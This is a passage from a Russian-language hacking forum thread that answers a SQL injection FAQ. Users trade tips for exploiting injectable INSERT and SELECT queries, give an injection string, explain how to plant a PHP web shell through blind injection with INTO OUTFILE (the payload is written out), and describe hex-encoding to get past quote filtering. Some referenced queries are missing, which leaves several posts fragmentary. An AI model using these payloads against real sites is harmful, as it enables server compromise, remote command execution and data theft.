Спасибо за FAQ!

Можно ли что-то сделать, если запрос в коде не (во всех примерах был только select )

а типа:
$id ни как не проверяется

?

Смотря что тебе надо. Но только добавление записи.
123', '321')--+

__________________
..

Хотелось бы SQL injection

Но проблема в том что mysql_query обрабатывает только один запрос.
т.е. кроме как вставить в эту таблицу чепуху не выходит.

Хочу узнать можно ли както использовать недочет такого кода

Можешь работать как с Blind SQL Inj, через more1row вот как тут (пункт 4): https://forum.antichat.ru/thread35207.html

З.Ы.
Почитай заодно: https://forum.antichat.ru/thread119047.html

__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

[небольшая заметка о залитии файлов в слепых инъекциях]

Посмотрев в интернете информацию по данному вопросу и ничего не найдя, решил поделиться с вами, дорогие друзья, своими мыслями...
Начнем с проверки прав, дабы убедиться, что у нас есть file_priv:
Если все ровно и нет никаких ошибок, следующим запросом льем шелл:
Можно также проверить залился ли файл, как мы проверяли наличие file_priv:
Плюс вышеописанной конструкции заключается в том, что где бы инъект не был, в операторе SELECT, UPDATE, INSERT и т.д., при присутствии file_priv и отсутствии magic_quotes, шелл будет литься.

[BONUS]
Продолжим мысль и придумаем еще одно применение данной конструкции....
Надеюсь все читали про способ заливки шелла через инъекции, даже с присутствием magic_quotes, посредством двойного запроса...
Так вот, чтобы залить шелл необходимо было ордер баем вычислять кол-во колонок, участвующих во втором(вложенном) запросе.
Использую же вышеописанную технику, можно сократить время подбора колонок(имхо, довольно существенно, потому что когда подбираешь кол-во, приходится каждый раз хексить внутренний запрос)

Хексим:
(1 and if((select "<?php system($_REQUEST[c]); ?>" into outfile '/tmp/test.txt'),1,2)=1-- )
И подставляем сие чудо на место поля, учавствующего в двойном запросе...

Iceangel_, кстати все эти запросы можно совместить, если я не ошибаюсь. В один удобный запрос, который сделает всё

__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

[ + еще одна небольшая "фича" по теме залития шелла через SQL Injection ]

Не уверен, что тут уже не писали о подобном способе аплоада шелла, но вроде пока не находил. Возможно, пригодится кому-то:
Т.е. если инъекция в аргументе WHERE (или в LIMIT'е, или в ORDER BY, etc) SELECT-запроса, то можно сразу сделать вывод в файл без UNION'а или подзапросов. Зачем там die() сами догадайтесь. (;

add: Ну или даже удобнее так: Вобщем, тут возможны вариации.

спасибо за подробную статью, очень удобный фак. Единственное, что мне кажеться ты забыл упамянуть, это то, что если в HEX переводятся значения, то это спасает от фильтрации кавычек и их не нужно указывать. Как к примеру - FROM INFO.._SCHEMA.TABLES WHERE=0xимятаблицы_в_хексе. Я использовал этот, чтоб научиться и понять как это делается, единственное, что начал тулить туда кавычки к хексу, и сначала не дошло почему мускул ругается...

Пункт 4.2 Фильтруется символ/строка, там как раз про hex

__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.